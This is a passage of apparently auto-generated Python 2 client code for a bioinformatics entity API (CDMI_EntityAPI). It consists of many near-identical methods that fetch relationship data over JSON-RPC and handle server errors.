se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GroupedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GroupedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Controls(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Controls',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsControlledUsing(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsControlledUsing',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DefaultControlSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DefaultControlSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SamplesDefaultControl(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SamplesDefaultControl',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Describes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Describes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDescribedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDescribedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAlignmentAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAlignmentAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesMeasurement(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesMeasurement',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDefinedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDefinedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTreeAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTreeAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesTreeNode(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesTreeNode',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasNodeAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasNodeAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DetectedWithMethod(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DetectedWithMethod',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DetectedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DetectedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Displays(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Displays',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDisplayedOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDisplayedOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Encompasses(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Encompasses',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsEncompassedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsEncompassedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_EvaluatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_EvaluatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureIsTranscriptionFactorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureIsTranscriptionFactorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTranscriptionFactorFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTranscriptionFactorFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasuresFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasuresFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Formulated(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Formulated',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasFormulatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasFormulatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GeneratedLevelsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GeneratedLevelsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasGeneratedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasGeneratedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GenomeParentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GenomeParentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
